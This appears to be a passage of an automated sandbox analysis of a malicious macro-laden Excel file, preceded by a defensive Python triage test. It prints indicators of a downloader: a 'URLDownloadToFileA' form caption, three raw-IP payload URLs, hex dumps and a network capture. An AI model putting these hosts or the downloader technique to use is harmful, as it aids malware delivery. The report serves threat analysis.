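    hdr = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x80))  # e_lfanew = 0x80
    hdr += b"\0" * (0x80 - len(hdr)) + b"PE\0\0"
    blob = bytes(hdr) + body
    return blob + b"\0" * max(0, size - len(blob))


if __name__ == "__main__":
    # Same size as the report's Fiosa.der; entropy is near zero because the blob is all padding.
    print(triage("Fiosa.der", make_fake_pe(495616)))
    # A body with every byte value equally often: high entropy, PE extension, nothing flagged.
    print(triage("msxml3.dll", make_fake_pe(0, bytes(range(256)) * 256)))
```

          The first call reproduces the pattern of Fiosa.der (PE behind a .der name, large, almost no entropy); the second is the control. Run against real files, the entropy of the padded one would not be this close to zero, since the genuine code sections still contribute, which is why the threshold is set well above 0 rather than at it.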

          Static File Info

          General

          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri Sep 24 10:05:02 2021, Security: 0
          Entropy (8bit):7.828790165256729
          TrID:
          • Microsoft Excel sheet (30009/1) 47.99%
          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
          File name:Claim-1763045001-09242021.xls
          File size:419328
          MD5:7a4ee63e2e2aacea7ffa5d4f27261347
          SHA1:c47ebf9357eaa3984e2a977a77469f2097004bda
          SHA256:3776549225fea6c85372989034fb8d4d0d94eeca4ba33e8473d50898afea6533
          SHA512:cb15fb771a78d7e1287135221322e3a1b7b5aa668f25e82a7f37381e33b676d2b573527961ecd6485b5fa38330e75380c14c9a86224fdfdba617ff585c965ffa
          SSDEEP:6144:Fk3hOdsylKlgxopeiBNhZF+E+W2kdAKTwapS+PS82DPz6ST4+e3G0Sb8duSgcVwN:e5Z8etSwuSgcfPwJjxwrcNDTfsXo/x3
          File Content Preview:........................>.......................................................b.......d.......f..............................................................................................................................................................

          File Icon

          Icon Hash:e4eea286a4b4bcb4

          Static OLE Info

          General

          Document Type:OLE
          Number of OLE Files:1

          OLE File "Claim-1763045001-09242021.xls"

          Indicators

          Has Summary Info:True
          Application Name:Microsoft Excel
          Encrypted Document:False
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:True
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:
          Flash Objects Count:
          Contains VBA Macros:True

          Summary

          Code Page:1251
          Author:Test
          Last Saved By:Test
          Create Time:2015-06-05 18:17:20
          Last Saved Time:2021-09-24 09:05:02
          Creating Application:Microsoft Excel
          Security:0

          Document Summary

          Document Code Page:1251
          Thumbnail Scaling Desired:False
          Company:
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:1048576

          Streams with VBA

          VBA File Name: UserForm1, Stream Size: -1
          General
          Stream Path:_VBA_PROJECT_CUR/UserForm1
          VBA File Name:UserForm1
          Stream Size:-1
          Data ASCII:
          Data Raw:
          VBA Code
          VBA File Name: Module1, Stream Size: 4112
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Module1
          VBA File Name:Module1
          Stream Size:4112
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 30 0d 00 00 00 00 00 00 01 00 00 00 41 a1 0d 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          VBA Code
          VBA File Name: Sheet1, Stream Size: 991
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
          VBA File Name:Sheet1
          Stream Size:991
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 41 a1 f7 99 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          VBA Code
          VBA File Name: ThisWorkbook, Stream Size: 2774
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
          VBA File Name:ThisWorkbook
          Stream Size:2774
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:01 16 03 00 00 f0 00 00 00 a2 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff aa 04 00 00 5e 08 00 00 00 00 00 00 01 00 00 00 41 a1 88 0a 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          VBA Code
          VBA File Name: UserForm1, Stream Size: 1180
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
          VBA File Name:UserForm1
          Stream Size:1180
          Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . A . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 41 a1 c5 51 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          VBA Code

          Streams

          Stream Path: \x1CompObj, File Type: data, Stream Size: 108
          General
          Stream Path:\x1CompObj
          File Type:data
          Stream Size:108
          Entropy:4.18849998853
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
          General
          Stream Path:\x5DocumentSummaryInformation
          File Type:data
          Stream Size:244
          Entropy:2.65175227267
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
          General
          Stream Path:\x5SummaryInformation
          File Type:data
          Stream Size:208
          Entropy:3.30164724619
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . 3 . B # . . . . . . . . . . .
          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 391141
          General
          Stream Path:Workbook
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:391141
          Entropy:7.94597570807
          Base64 Encoded:True
          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . d . % 8 . . . . . . . X . @
          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
          Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 661
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECT
          File Type:ASCII text, with CRLF line terminators
          Stream Size:661
          Entropy:5.27224586563
          Base64 Encoded:True
          Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
          Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 50 61 63 6b 61
          Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
          File Type:data
          Stream Size:116
          Entropy:3.35524796933
          Base64 Encoded:False
          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00
          Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
          General
          Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
          File Type:data
          Stream Size:97
          Entropy:3.61064918306
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 301
          General
          Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
          File Type:ASCII text, with CRLF line terminators
          Stream Size:301
          Entropy:4.64742015018
          Base64 Encoded:True
          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
          Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
          Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 263
          General
          Stream Path:_VBA_PROJECT_CUR/UserForm1/f
          File Type:data
          Stream Size:263
          Entropy:3.59027175124
          Base64 Encoded:False
          Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . O
          Data Raw:00 04 24 00 08 0c 10 0c 04 00 00 00 ff ff 00 00 04 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 b4 00 00 00 00 84 01 01 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 a7 01 00 00 d4
          Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 272
          General
          Stream Path:_VBA_PROJECT_CUR/UserForm1/o
          File Type:data
          Stream Size:272
          Entropy:3.7315998228
          Base64 Encoded:True
          Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 1 1 . 9 0 . 1 4 8 . 1 0 4 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 5 1 . 8 9 . 1 1 5 . 1 1 1 / . . . . . . . . . . . . . . . 5 . . . . . . .
          Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 33 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 03 18 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 01 f4
          Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3819
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
          File Type:data
          Stream Size:3819
          Entropy:4.49037503963
          Base64 Encoded:False
          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
          Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2035
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
          File Type:data
          Stream Size:2035
          Entropy:3.42846113886
          Base64 Encoded:False
          Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . $ . . . . D . Q . . . . = s . . . . . . . .
          Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
          File Type:data
          Stream Size:138
          Entropy:1.48462480805
          Base64 Encoded:False
          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 6a 00 00 00 00 00
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
          File Type:data
          Stream Size:264
          Entropy:1.9985725068
          Base64 Encoded:False
          Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
          Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
          File Type:data
          Stream Size:256
          Entropy:1.80540314317
          Base64 Encoded:False
          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
          Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: SVR2 executable (USS/370) not stripped - version 12587540, Stream Size: 865
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/dir
          File Type:SVR2 executable (USS/370) not stripped - version 12587540
          Stream Size:865
          Entropy:6.55213343791
          Base64 Encoded:True
          Data ASCII:. ] . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . v . A c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
          Data Raw:01 5d b3 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 ba 76 a0 41 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

          Network Behavior

          Network Port Distribution

          TCP Packets

          Timestamp                             Source Port  Dest Port  Source IP      Dest IP
          Sep 24, 2021 16:28:10.834551096 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:11.029290915 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:11.029418945 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:11.030591965 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:11.218058109 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048015118 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048058987 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048084974 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048121929 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048145056 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048168898 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048186064 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048196077 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.048213005 CEST  49165        80         192.168.2.22   190.14.37.173
